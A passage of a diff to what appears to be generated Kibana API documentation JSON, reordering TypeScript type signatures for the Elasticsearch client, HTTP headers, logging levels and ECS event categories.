undefined): Promise<", + "GetResponse", + ">; }; delete: { (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptionsWithOutMeta", + " | undefined): Promise<", + "WriteResponseBase", + ">; (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptionsWithMeta", + " | undefined): Promise<", + "TransportResult", + "<", + "WriteResponseBase", + ", unknown>>; (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptions", + " | undefined): Promise<", + "WriteResponseBase", + ">; }; cluster: ", + "default", + "; eql: ", "default", "; search: { >; }; cluster: ", - "default", - "; eql: ", - "default", - "; create: { (this: That, params: ", + ">; }; create: { (this: That, params: ", "CreateRequest", " | ", "CreateRequest", @@ -21943,7 +21993,7 @@ "default", "; security: ", "default", - "; index: { (this: That, params: ", + "; name: string | symbol; index: { (this: That, params: ", "IndexRequest", " | ", "IndexRequest", @@ -21969,33 +22019,7 @@ "TransportRequestOptions", " | undefined): Promise<", "WriteResponseBase", - ">; }; get: { (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptionsWithOutMeta", - " | undefined): Promise<", - "GetResponse", - ">; (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptionsWithMeta", - " | undefined): Promise<", - "TransportResult", - "<", - "GetResponse", - ", unknown>>; (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptions", - " | undefined): Promise<", - "GetResponse", - ">; }; update: { (this: That, params: ", + ">; }; update: { (this: That, params: ", "UpdateRequest", " | ", "UpdateRequest", @@ -22021,33 +22045,7 @@ "TransportRequestOptions", " | undefined): Promise<", "UpdateResponse", - ">; }; delete: { (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptionsWithOutMeta", - " | undefined): Promise<", - "WriteResponseBase", - ">; (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptionsWithMeta", - " | undefined): Promise<", - "TransportResult", - "<", - "WriteResponseBase", - ", unknown>>; (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptions", - " | undefined): Promise<", - "WriteResponseBase", - ">; }; [kInternal]: symbol | null; [kAsyncSearch]: symbol | null; [kAutoscaling]: symbol | null; [kCat]: symbol | null; [kCcr]: symbol | null; [kCluster]: symbol | null; [kDanglingIndices]: symbol | null; [kEnrich]: symbol | null; [kEql]: symbol | null; [kFeatures]: symbol | null; [kFleet]: symbol | null; [kGraph]: symbol | null; [kIlm]: symbol | null; [kIndices]: symbol | null; [kIngest]: symbol | null; [kLicense]: symbol | null; [kLogstash]: symbol | null; [kMigration]: symbol | null; [kMl]: symbol | null; [kMonitoring]: symbol | null; [kNodes]: symbol | null; [kRollup]: symbol | null; [kSearchableSnapshots]: symbol | null; [kSecurity]: symbol | null; [kShutdown]: symbol | null; [kSlm]: symbol | null; [kSnapshot]: symbol | null; [kSql]: symbol | null; [kSsl]: symbol | null; [kTasks]: symbol | null; [kTextStructure]: symbol | null; [kTransform]: symbol | null; [kWatcher]: symbol | null; [kXpack]: symbol | null; transport: ", + ">; }; [kInternal]: symbol | null; [kAsyncSearch]: symbol | null; [kAutoscaling]: symbol | null; [kCat]: symbol | null; [kCcr]: symbol | null; [kCluster]: symbol | null; [kDanglingIndices]: symbol | null; [kEnrich]: symbol | null; [kEql]: symbol | null; [kFeatures]: symbol | null; [kFleet]: symbol | null; [kGraph]: symbol | null; [kIlm]: symbol | null; [kIndices]: symbol | null; [kIngest]: symbol | null; [kLicense]: symbol | null; [kLogstash]: symbol | null; [kMigration]: symbol | null; [kMl]: symbol | null; [kMonitoring]: symbol | null; [kNodes]: symbol | null; [kRollup]: symbol | null; [kSearchableSnapshots]: symbol | null; [kSecurity]: symbol | null; [kShutdown]: symbol | null; [kSlm]: symbol | null; [kSnapshot]: symbol | null; [kSql]: symbol | null; [kSsl]: symbol | null; [kTasks]: symbol | null; [kTextStructure]: symbol | null; [kTransform]: symbol | null; [kWatcher]: symbol | null; [kXpack]: symbol | null; transport: ", "default", "; helpers: ", "default", @@ -23007,6 +23005,8 @@ "TermvectorsResponse", ">; }; textStructure: ", "default", + "; transform: ", + "default", "; updateByQuery: { (this: That, params: ", "UpdateByQueryRequest", " | ", @@ -23625,7 +23625,7 @@ "\nReadonly copy of incoming request headers." ], "signature": [ - "{ from?: string | string[] | undefined; origin?: string | string[] | undefined; warning?: string | string[] | undefined; location?: string | string[] | undefined; date?: string | string[] | undefined; expires?: string | string[] | undefined; range?: string | string[] | undefined; allow?: string | string[] | undefined; accept?: string | string[] | undefined; host?: string | string[] | undefined; etag?: string | string[] | undefined; authorization?: string | string[] | undefined; \"accept-language\"?: string | string[] | undefined; \"accept-patch\"?: string | string[] | undefined; \"accept-ranges\"?: string | string[] | undefined; \"access-control-allow-credentials\"?: string | string[] | undefined; \"access-control-allow-headers\"?: string | string[] | undefined; \"access-control-allow-methods\"?: string | string[] | undefined; \"access-control-allow-origin\"?: string | string[] | undefined; \"access-control-expose-headers\"?: string | string[] | undefined; \"access-control-max-age\"?: string | string[] | undefined; \"access-control-request-headers\"?: string | string[] | undefined; \"access-control-request-method\"?: string | string[] | undefined; age?: string | string[] | undefined; \"alt-svc\"?: string | string[] | undefined; \"cache-control\"?: string | string[] | undefined; connection?: string | string[] | undefined; \"content-disposition\"?: string | string[] | undefined; \"content-encoding\"?: string | string[] | undefined; \"content-language\"?: string | string[] | undefined; \"content-length\"?: string | string[] | undefined; \"content-location\"?: string | string[] | undefined; \"content-range\"?: string | string[] | undefined; \"content-type\"?: string | string[] | undefined; cookie?: string | string[] | undefined; expect?: string | string[] | undefined; forwarded?: string | string[] | undefined; \"if-match\"?: string | string[] | undefined; \"if-modified-since\"?: string | string[] | undefined; \"if-none-match\"?: string | string[] | undefined; \"if-unmodified-since\"?: string | string[] | undefined; \"last-modified\"?: string | string[] | undefined; pragma?: string | string[] | undefined; \"proxy-authenticate\"?: string | string[] | undefined; \"proxy-authorization\"?: string | string[] | undefined; \"public-key-pins\"?: string | string[] | undefined; referer?: string | string[] | undefined; \"retry-after\"?: string | string[] | undefined; \"sec-websocket-accept\"?: string | string[] | undefined; \"sec-websocket-extensions\"?: string | string[] | undefined; \"sec-websocket-key\"?: string | string[] | undefined; \"sec-websocket-protocol\"?: string | string[] | undefined; \"sec-websocket-version\"?: string | string[] | undefined; \"set-cookie\"?: string | string[] | undefined; \"strict-transport-security\"?: string | string[] | undefined; tk?: string | string[] | undefined; trailer?: string | string[] | undefined; \"transfer-encoding\"?: string | string[] | undefined; upgrade?: string | string[] | undefined; \"user-agent\"?: string | string[] | undefined; vary?: string | string[] | undefined; via?: string | string[] | undefined; \"www-authenticate\"?: string | string[] | undefined; } & { [header: string]: string | string[] | undefined; }" + "{ accept?: string | string[] | undefined; \"accept-language\"?: string | string[] | undefined; \"accept-patch\"?: string | string[] | undefined; \"accept-ranges\"?: string | string[] | undefined; \"access-control-allow-credentials\"?: string | string[] | undefined; \"access-control-allow-headers\"?: string | string[] | undefined; \"access-control-allow-methods\"?: string | string[] | undefined; \"access-control-allow-origin\"?: string | string[] | undefined; \"access-control-expose-headers\"?: string | string[] | undefined; \"access-control-max-age\"?: string | string[] | undefined; \"access-control-request-headers\"?: string | string[] | undefined; \"access-control-request-method\"?: string | string[] | undefined; age?: string | string[] | undefined; allow?: string | string[] | undefined; \"alt-svc\"?: string | string[] | undefined; authorization?: string | string[] | undefined; \"cache-control\"?: string | string[] | undefined; connection?: string | string[] | undefined; \"content-disposition\"?: string | string[] | undefined; \"content-encoding\"?: string | string[] | undefined; \"content-language\"?: string | string[] | undefined; \"content-length\"?: string | string[] | undefined; \"content-location\"?: string | string[] | undefined; \"content-range\"?: string | string[] | undefined; \"content-type\"?: string | string[] | undefined; cookie?: string | string[] | undefined; date?: string | string[] | undefined; etag?: string | string[] | undefined; expect?: string | string[] | undefined; expires?: string | string[] | undefined; forwarded?: string | string[] | undefined; from?: string | string[] | undefined; host?: string | string[] | undefined; \"if-match\"?: string | string[] | undefined; \"if-modified-since\"?: string | string[] | undefined; \"if-none-match\"?: string | string[] | undefined; \"if-unmodified-since\"?: string | string[] | undefined; \"last-modified\"?: string | string[] | undefined; location?: string | string[] | undefined; origin?: string | string[] | undefined; pragma?: string | string[] | undefined; \"proxy-authenticate\"?: string | string[] | undefined; \"proxy-authorization\"?: string | string[] | undefined; \"public-key-pins\"?: string | string[] | undefined; range?: string | string[] | undefined; referer?: string | string[] | undefined; \"retry-after\"?: string | string[] | undefined; \"sec-websocket-accept\"?: string | string[] | undefined; \"sec-websocket-extensions\"?: string | string[] | undefined; \"sec-websocket-key\"?: string | string[] | undefined; \"sec-websocket-protocol\"?: string | string[] | undefined; \"sec-websocket-version\"?: string | string[] | undefined; \"set-cookie\"?: string | string[] | undefined; \"strict-transport-security\"?: string | string[] | undefined; tk?: string | string[] | undefined; trailer?: string | string[] | undefined; \"transfer-encoding\"?: string | string[] | undefined; upgrade?: string | string[] | undefined; \"user-agent\"?: string | string[] | undefined; vary?: string | string[] | undefined; via?: string | string[] | undefined; warning?: string | string[] | undefined; \"www-authenticate\"?: string | string[] | undefined; } & { [header: string]: string | string[] | undefined; }" ], "path": "node_modules/@types/kbn__core-http-server/index.d.ts", "deprecated": false @@ -23848,7 +23848,7 @@ "label": "options", "description": [], "signature": [ - "Method extends \"options\" | \"get\" ? Required, \"body\">> : Required<", "RouteConfigOptions", @@ -24281,7 +24281,7 @@ "label": "level", "description": [], "signature": [ - "\"error\" | \"all\" | \"off\" | \"info\" | \"debug\" | \"trace\" | \"warn\" | \"fatal\"" + "\"error\" | \"all\" | \"info\" | \"debug\" | \"off\" | \"trace\" | \"warn\" | \"fatal\"" ], "path": "node_modules/@types/kbn__core-logging-server/index.d.ts", "deprecated": false @@ -26170,7 +26170,61 @@ "label": "internalClient", "description": [], "signature": [ - "{ name: string | symbol; transform: ", + "{ get: { (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptionsWithOutMeta", + " | undefined): Promise<", + "GetResponse", + ">; (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptionsWithMeta", + " | undefined): Promise<", + "TransportResult", + "<", + "GetResponse", + ", unknown>>; (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptions", + " | undefined): Promise<", + "GetResponse", + ">; }; delete: { (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptionsWithOutMeta", + " | undefined): Promise<", + "WriteResponseBase", + ">; (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptionsWithMeta", + " | undefined): Promise<", + "TransportResult", + "<", + "WriteResponseBase", + ", unknown>>; (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptions", + " | undefined): Promise<", + "WriteResponseBase", + ">; }; cluster: ", + "default", + "; eql: ", "default", "; search: { >; }; cluster: ", - "default", - "; eql: ", - "default", - "; create: { (this: That, params: ", + ">; }; create: { (this: That, params: ", "CreateRequest", " | ", "CreateRequest", @@ -26238,7 +26288,7 @@ "default", "; security: ", "default", - "; index: { (this: That, params: ", + "; name: string | symbol; index: { (this: That, params: ", "IndexRequest", " | ", "IndexRequest", @@ -26264,33 +26314,7 @@ "TransportRequestOptions", " | undefined): Promise<", "WriteResponseBase", - ">; }; get: { (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptionsWithOutMeta", - " | undefined): Promise<", - "GetResponse", - ">; (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptionsWithMeta", - " | undefined): Promise<", - "TransportResult", - "<", - "GetResponse", - ", unknown>>; (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptions", - " | undefined): Promise<", - "GetResponse", - ">; }; update: { (this: That, params: ", + ">; }; update: { (this: That, params: ", "UpdateRequest", " | ", "UpdateRequest", @@ -26316,33 +26340,7 @@ "TransportRequestOptions", " | undefined): Promise<", "UpdateResponse", - ">; }; delete: { (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptionsWithOutMeta", - " | undefined): Promise<", - "WriteResponseBase", - ">; (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptionsWithMeta", - " | undefined): Promise<", - "TransportResult", - "<", - "WriteResponseBase", - ", unknown>>; (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptions", - " | undefined): Promise<", - "WriteResponseBase", - ">; }; [kInternal]: symbol | null; [kAsyncSearch]: symbol | null; [kAutoscaling]: symbol | null; [kCat]: symbol | null; [kCcr]: symbol | null; [kCluster]: symbol | null; [kDanglingIndices]: symbol | null; [kEnrich]: symbol | null; [kEql]: symbol | null; [kFeatures]: symbol | null; [kFleet]: symbol | null; [kGraph]: symbol | null; [kIlm]: symbol | null; [kIndices]: symbol | null; [kIngest]: symbol | null; [kLicense]: symbol | null; [kLogstash]: symbol | null; [kMigration]: symbol | null; [kMl]: symbol | null; [kMonitoring]: symbol | null; [kNodes]: symbol | null; [kRollup]: symbol | null; [kSearchableSnapshots]: symbol | null; [kSecurity]: symbol | null; [kShutdown]: symbol | null; [kSlm]: symbol | null; [kSnapshot]: symbol | null; [kSql]: symbol | null; [kSsl]: symbol | null; [kTasks]: symbol | null; [kTextStructure]: symbol | null; [kTransform]: symbol | null; [kWatcher]: symbol | null; [kXpack]: symbol | null; transport: ", + ">; }; [kInternal]: symbol | null; [kAsyncSearch]: symbol | null; [kAutoscaling]: symbol | null; [kCat]: symbol | null; [kCcr]: symbol | null; [kCluster]: symbol | null; [kDanglingIndices]: symbol | null; [kEnrich]: symbol | null; [kEql]: symbol | null; [kFeatures]: symbol | null; [kFleet]: symbol | null; [kGraph]: symbol | null; [kIlm]: symbol | null; [kIndices]: symbol | null; [kIngest]: symbol | null; [kLicense]: symbol | null; [kLogstash]: symbol | null; [kMigration]: symbol | null; [kMl]: symbol | null; [kMonitoring]: symbol | null; [kNodes]: symbol | null; [kRollup]: symbol | null; [kSearchableSnapshots]: symbol | null; [kSecurity]: symbol | null; [kShutdown]: symbol | null; [kSlm]: symbol | null; [kSnapshot]: symbol | null; [kSql]: symbol | null; [kSsl]: symbol | null; [kTasks]: symbol | null; [kTextStructure]: symbol | null; [kTransform]: symbol | null; [kWatcher]: symbol | null; [kXpack]: symbol | null; transport: ", "default", "; helpers: ", "default", @@ -27302,6 +27300,8 @@ "TermvectorsResponse", ">; }; textStructure: ", "default", + "; transform: ", + "default", "; updateByQuery: { (this: That, params: ", "UpdateByQueryRequest", " | ", @@ -27780,7 +27780,7 @@ "\nAdditional body options {@link RouteConfigOptionsBody}." ], "signature": [ - "(Method extends \"options\" | \"get\" ? undefined : ", + "(Method extends \"get\" | \"options\" ? undefined : ", "RouteConfigOptionsBody", ") | undefined" ], @@ -27797,7 +27797,7 @@ "\nDefines per-route timeouts." ], "signature": [ - "{ payload?: (Method extends \"options\" | \"get\" ? undefined : number) | undefined; idleSocket?: number | undefined; } | undefined" + "{ payload?: (Method extends \"get\" | \"options\" ? undefined : number) | undefined; idleSocket?: number | undefined; } | undefined" ], "path": "node_modules/@types/kbn__core-http-server/index.d.ts", "deprecated": false @@ -35653,7 +35653,7 @@ "array of permitted values for this setting" ], "signature": [ - "number[] | string[] | undefined" + "string[] | number[] | undefined" ], "path": "node_modules/@types/kbn__core-ui-settings-common/index.d.ts", "deprecated": false @@ -36790,7 +36790,7 @@ "\nSet of HTTP methods changing the state of the server." ], "signature": [ - "\"delete\" | \"post\" | \"put\" | \"patch\"" + "\"post\" | \"put\" | \"delete\" | \"patch\"" ], "path": "node_modules/@types/kbn__core-http-server/index.d.ts", "deprecated": false, @@ -36909,7 +36909,7 @@ "label": "EcsEventCategory", "description": [], "signature": [ - "\"database\" | \"email\" | \"package\" | \"network\" | \"web\" | \"file\" | \"host\" | \"session\" | \"registry\" | \"process\" | \"authentication\" | \"configuration\" | \"driver\" | \"iam\" | \"intrusion_detection\" | \"malware\"" + "\"host\" | \"database\" | \"email\" | \"package\" | \"network\" | \"web\" | \"file\" | \"session\" | \"registry\" | \"process\" | \"authentication\" | \"configuration\" | \"driver\" | \"iam\" | \"intrusion_detection\" | \"malware\"" ], "path": "node_modules/@types/kbn__logging/index.d.ts", "deprecated": false, @@ -36951,7 +36951,7 @@ "label": "EcsEventType", "description": [], "signature": [ - "\"start\" | \"error\" | \"end\" | \"group\" | \"user\" | \"info\" | \"admin\" | \"protocol\" | \"connection\" | \"access\" | \"allowed\" | \"change\" | \"creation\" | \"deletion\" | \"denied\" | \"installation\"" + "\"start\" | \"error\" | \"connection\" | \"user\" | \"info\" | \"group\" | \"end\" | \"admin\" | \"protocol\" | \"access\" | \"allowed\" | \"change\" | \"creation\" | \"deletion\" | \"denied\" | \"installation\"" ], "path": "node_modules/@types/kbn__logging/index.d.ts", "deprecated": false, @@ -36967,7 +36967,61 @@ "\nClient used to query the elasticsearch cluster.\n" ], "signature": [ - "{ name: string | symbol; transform: ", + "{ get: { (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptionsWithOutMeta", + " | undefined): Promise<", + "GetResponse", + ">; (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptionsWithMeta", + " | undefined): Promise<", + "TransportResult", + "<", + "GetResponse", + ", unknown>>; (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptions", + " | undefined): Promise<", + "GetResponse", + ">; }; delete: { (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptionsWithOutMeta", + " | undefined): Promise<", + "WriteResponseBase", + ">; (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptionsWithMeta", + " | undefined): Promise<", + "TransportResult", + "<", + "WriteResponseBase", + ", unknown>>; (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptions", + " | undefined): Promise<", + "WriteResponseBase", + ">; }; cluster: ", + "default", + "; eql: ", "default", "; search: { >; }; cluster: ", - "default", - "; eql: ", - "default", - "; create: { (this: That, params: ", + ">; }; create: { (this: That, params: ", "CreateRequest", " | ", "CreateRequest", @@ -37035,7 +37085,7 @@ "default", "; security: ", "default", - "; index: { (this: That, params: ", + "; name: string | symbol; index: { (this: That, params: ", "IndexRequest", " | ", "IndexRequest", @@ -37061,33 +37111,7 @@ "TransportRequestOptions", " | undefined): Promise<", "WriteResponseBase", - ">; }; get: { (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptionsWithOutMeta", - " | undefined): Promise<", - "GetResponse", - ">; (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptionsWithMeta", - " | undefined): Promise<", - "TransportResult", - "<", - "GetResponse", - ", unknown>>; (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptions", - " | undefined): Promise<", - "GetResponse", - ">; }; update: { (this: That, params: ", + ">; }; update: { (this: That, params: ", "UpdateRequest", " | ", "UpdateRequest", @@ -37113,33 +37137,7 @@ "TransportRequestOptions", " | undefined): Promise<", "UpdateResponse", - ">; }; delete: { (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptionsWithOutMeta", - " | undefined): Promise<", - "WriteResponseBase", - ">; (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptionsWithMeta", - " | undefined): Promise<", - "TransportResult", - "<", - "WriteResponseBase", - ", unknown>>; (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptions", - " | undefined): Promise<", - "WriteResponseBase", - ">; }; [kInternal]: symbol | null; [kAsyncSearch]: symbol | null; [kAutoscaling]: symbol | null; [kCat]: symbol | null; [kCcr]: symbol | null; [kCluster]: symbol | null; [kDanglingIndices]: symbol | null; [kEnrich]: symbol | null; [kEql]: symbol | null; [kFeatures]: symbol | null; [kFleet]: symbol | null; [kGraph]: symbol | null; [kIlm]: symbol | null; [kIndices]: symbol | null; [kIngest]: symbol | null; [kLicense]: symbol | null; [kLogstash]: symbol | null; [kMigration]: symbol | null; [kMl]: symbol | null; [kMonitoring]: symbol | null; [kNodes]: symbol | null; [kRollup]: symbol | null; [kSearchableSnapshots]: symbol | null; [kSecurity]: symbol | null; [kShutdown]: symbol | null; [kSlm]: symbol | null; [kSnapshot]: symbol | null; [kSql]: symbol | null; [kSsl]: symbol | null; [kTasks]: symbol | null; [kTextStructure]: symbol | null; [kTransform]: symbol | null; [kWatcher]: symbol | null; [kXpack]: symbol | null; transport: ", + ">; }; [kInternal]: symbol | null; [kAsyncSearch]: symbol | null; [kAutoscaling]: symbol | null; [kCat]: symbol | null; [kCcr]: symbol | null; [kCluster]: symbol | null; [kDanglingIndices]: symbol | null; [kEnrich]: symbol | null; [kEql]: symbol | null; [kFeatures]: symbol | null; [kFleet]: symbol | null; [kGraph]: symbol | null; [kIlm]: symbol | null; [kIndices]: symbol | null; [kIngest]: symbol | null; [kLicense]: symbol | null; [kLogstash]: symbol | null; [kMigration]: symbol | null; [kMl]: symbol | null; [kMonitoring]: symbol | null; [kNodes]: symbol | null; [kRollup]: symbol | null; [kSearchableSnapshots]: symbol | null; [kSecurity]: symbol | null; [kShutdown]: symbol | null; [kSlm]: symbol | null; [kSnapshot]: symbol | null; [kSql]: symbol | null; [kSsl]: symbol | null; [kTasks]: symbol | null; [kTextStructure]: symbol | null; [kTransform]: symbol | null; [kWatcher]: symbol | null; [kXpack]: symbol | null; transport: ", "default", "; helpers: ", "default", @@ -38099,6 +38097,8 @@ "TermvectorsResponse", ">; }; textStructure: ", "default", + "; transform: ", + "default", "; updateByQuery: { (this: That, params: ", "UpdateByQueryRequest", " | ", @@ -38386,7 +38386,7 @@ "\nHttp request headers to read." ], "signature": [ - "{ from?: string | string[] | undefined; origin?: string | string[] | undefined; warning?: string | string[] | undefined; location?: string | string[] | undefined; date?: string | string[] | undefined; expires?: string | string[] | undefined; range?: string | string[] | undefined; allow?: string | string[] | undefined; accept?: string | string[] | undefined; host?: string | string[] | undefined; etag?: string | string[] | undefined; authorization?: string | string[] | undefined; \"accept-language\"?: string | string[] | undefined; \"accept-patch\"?: string | string[] | undefined; \"accept-ranges\"?: string | string[] | undefined; \"access-control-allow-credentials\"?: string | string[] | undefined; \"access-control-allow-headers\"?: string | string[] | undefined; \"access-control-allow-methods\"?: string | string[] | undefined; \"access-control-allow-origin\"?: string | string[] | undefined; \"access-control-expose-headers\"?: string | string[] | undefined; \"access-control-max-age\"?: string | string[] | undefined; \"access-control-request-headers\"?: string | string[] | undefined; \"access-control-request-method\"?: string | string[] | undefined; age?: string | string[] | undefined; \"alt-svc\"?: string | string[] | undefined; \"cache-control\"?: string | string[] | undefined; connection?: string | string[] | undefined; \"content-disposition\"?: string | string[] | undefined; \"content-encoding\"?: string | string[] | undefined; \"content-language\"?: string | string[] | undefined; \"content-length\"?: string | string[] | undefined; \"content-location\"?: string | string[] | undefined; \"content-range\"?: string | string[] | undefined; \"content-type\"?: string | string[] | undefined; cookie?: string | string[] | undefined; expect?: string | string[] | undefined; forwarded?: string | string[] | undefined; \"if-match\"?: string | string[] | undefined; \"if-modified-since\"?: string | string[] | undefined; \"if-none-match\"?: string | string[] | undefined; \"if-unmodified-since\"?: string | string[] | undefined; \"last-modified\"?: string | string[] | undefined; pragma?: string | string[] | undefined; \"proxy-authenticate\"?: string | string[] | undefined; \"proxy-authorization\"?: string | string[] | undefined; \"public-key-pins\"?: string | string[] | undefined; referer?: string | string[] | undefined; \"retry-after\"?: string | string[] | undefined; \"sec-websocket-accept\"?: string | string[] | undefined; \"sec-websocket-extensions\"?: string | string[] | undefined; \"sec-websocket-key\"?: string | string[] | undefined; \"sec-websocket-protocol\"?: string | string[] | undefined; \"sec-websocket-version\"?: string | string[] | undefined; \"set-cookie\"?: string | string[] | undefined; \"strict-transport-security\"?: string | string[] | undefined; tk?: string | string[] | undefined; trailer?: string | string[] | undefined; \"transfer-encoding\"?: string | string[] | undefined; upgrade?: string | string[] | undefined; \"user-agent\"?: string | string[] | undefined; vary?: string | string[] | undefined; via?: string | string[] | undefined; \"www-authenticate\"?: string | string[] | undefined; } & { [header: string]: string | string[] | undefined; }" + "{ accept?: string | string[] | undefined; \"accept-language\"?: string | string[] | undefined; \"accept-patch\"?: string | string[] | undefined; \"accept-ranges\"?: string | string[] | undefined; \"access-control-allow-credentials\"?: string | string[] | undefined; \"access-control-allow-headers\"?: string | string[] | undefined; \"access-control-allow-methods\"?: string | string[] | undefined; \"access-control-allow-origin\"?: string | string[] | undefined; \"access-control-expose-headers\"?: string | string[] | undefined; \"access-control-max-age\"?: string | string[] | undefined; \"access-control-request-headers\"?: string | string[] | undefined; \"access-control-request-method\"?: string | string[] | undefined; age?: string | string[] | undefined; allow?: string | string[] | undefined; \"alt-svc\"?: string | string[] | undefined; authorization?: string | string[] | undefined; \"cache-control\"?: string | string[] | undefined; connection?: string | string[] | undefined; \"content-disposition\"?: string | string[] | undefined; \"content-encoding\"?: string | string[] | undefined; \"content-language\"?: string | string[] | undefined; \"content-length\"?: string | string[] | undefined; \"content-location\"?: string | string[] | undefined; \"content-range\"?: string | string[] | undefined; \"content-type\"?: string | string[] | undefined; cookie?: string | string[] | undefined; date?: string | string[] | undefined; etag?: string | string[] | undefined; expect?: string | string[] | undefined; expires?: string | string[] | undefined; forwarded?: string | string[] | undefined; from?: string | string[] | undefined; host?: string | string[] | undefined; \"if-match\"?: string | string[] | undefined; \"if-modified-since\"?: string | string[] | undefined; \"if-none-match\"?: string | string[] | undefined; \"if-unmodified-since\"?: string | string[] | undefined; \"last-modified\"?: string | string[] | undefined; location?: string | string[] | undefined; origin?: string | string[] | undefined; pragma?: string | string[] | undefined; \"proxy-authenticate\"?: string | string[] | undefined; \"proxy-authorization\"?: string | string[] | undefined; \"public-key-pins\"?: string | string[] | undefined; range?: string | string[] | undefined; referer?: string | string[] | undefined; \"retry-after\"?: string | string[] | undefined; \"sec-websocket-accept\"?: string | string[] | undefined; \"sec-websocket-extensions\"?: string | string[] | undefined; \"sec-websocket-key\"?: string | string[] | undefined; \"sec-websocket-protocol\"?: string | string[] | undefined; \"sec-websocket-version\"?: string | string[] | undefined; \"set-cookie\"?: string | string[] | undefined; \"strict-transport-security\"?: string | string[] | undefined; tk?: string | string[] | undefined; trailer?: string | string[] | undefined; \"transfer-encoding\"?: string | string[] | undefined; upgrade?: string | string[] | undefined; \"user-agent\"?: string | string[] | undefined; vary?: string | string[] | undefined; via?: string | string[] | undefined; warning?: string | string[] | undefined; \"www-authenticate\"?: string | string[] | undefined; } & { [header: string]: string | string[] | undefined; }" ], "path": "node_modules/@types/kbn__core-http-server/index.d.ts", "deprecated": false, @@ -38643,7 +38643,7 @@ "\nRoute options: If 'GET' or 'OPTIONS' method, body options won't be returned." ], "signature": [ - "Method extends \"options\" | \"get\" ? Required, \"body\">> : Required<", "RouteConfigOptions", @@ -38719,7 +38719,7 @@ "\nSet of well-known HTTP headers." ], "signature": [ - "\"from\" | \"origin\" | \"warning\" | \"location\" | \"date\" | \"expires\" | \"range\" | \"allow\" | \"accept\" | \"host\" | \"etag\" | \"authorization\" | \"accept-language\" | \"accept-patch\" | \"accept-ranges\" | \"access-control-allow-credentials\" | \"access-control-allow-headers\" | \"access-control-allow-methods\" | \"access-control-allow-origin\" | \"access-control-expose-headers\" | \"access-control-max-age\" | \"access-control-request-headers\" | \"access-control-request-method\" | \"age\" | \"alt-svc\" | \"cache-control\" | \"connection\" | \"content-disposition\" | \"content-encoding\" | \"content-language\" | \"content-length\" | \"content-location\" | \"content-range\" | \"content-type\" | \"cookie\" | \"expect\" | \"forwarded\" | \"if-match\" | \"if-modified-since\" | \"if-none-match\" | \"if-unmodified-since\" | \"last-modified\" | \"pragma\" | \"proxy-authenticate\" | \"proxy-authorization\" | \"public-key-pins\" | \"referer\" | \"retry-after\" | \"sec-websocket-accept\" | \"sec-websocket-extensions\" | \"sec-websocket-key\" | \"sec-websocket-protocol\" | \"sec-websocket-version\" | \"set-cookie\" | \"strict-transport-security\" | \"tk\" | \"trailer\" | \"transfer-encoding\" | \"upgrade\" | \"user-agent\" | \"vary\" | \"via\" | \"www-authenticate\"" + "\"accept\" | \"accept-language\" | \"accept-patch\" | \"accept-ranges\" | \"access-control-allow-credentials\" | \"access-control-allow-headers\" | \"access-control-allow-methods\" | \"access-control-allow-origin\" | \"access-control-expose-headers\" | \"access-control-max-age\" | \"access-control-request-headers\" | \"access-control-request-method\" | \"age\" | \"allow\" | \"alt-svc\" | \"authorization\" | \"cache-control\" | \"connection\" | \"content-disposition\" | \"content-encoding\" | \"content-language\" | \"content-length\" | \"content-location\" | \"content-range\" | \"content-type\" | \"cookie\" | \"date\" | \"etag\" | \"expect\" | \"expires\" | \"forwarded\" | \"from\" | \"host\" | \"if-match\" | \"if-modified-since\" | \"if-none-match\" | \"if-unmodified-since\" | \"last-modified\" | \"location\" | \"origin\" | \"pragma\" | 